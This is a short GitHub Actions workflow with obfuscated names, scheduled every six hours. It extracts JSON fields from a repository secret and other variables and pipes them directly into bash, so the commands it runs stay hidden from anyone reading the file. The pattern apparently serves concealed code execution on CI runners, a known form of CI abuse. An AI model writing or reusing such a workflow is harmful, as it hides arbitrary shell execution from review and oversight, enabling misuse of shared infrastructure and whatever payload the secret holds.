name: hantao19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hantao19871010
        env:
          ak80446: ${{ secrets.ak80446 }}
        run: |
          echo $ak80446 | jq -r .w097 | /bin/bash
          echo $tghr1 | jq -r .v49849 | /bin/bash
          echo $hbxq138 | jq -r .srpp8 | /bin/bash
          echo $zbnsc6504 | jq -r .ngf68617 | /bin/bash
          echo $pi7 | jq -r .sek6 | /bin/bash
          echo $gdw8599 | jq -r .wvt1212 | /bin/bash

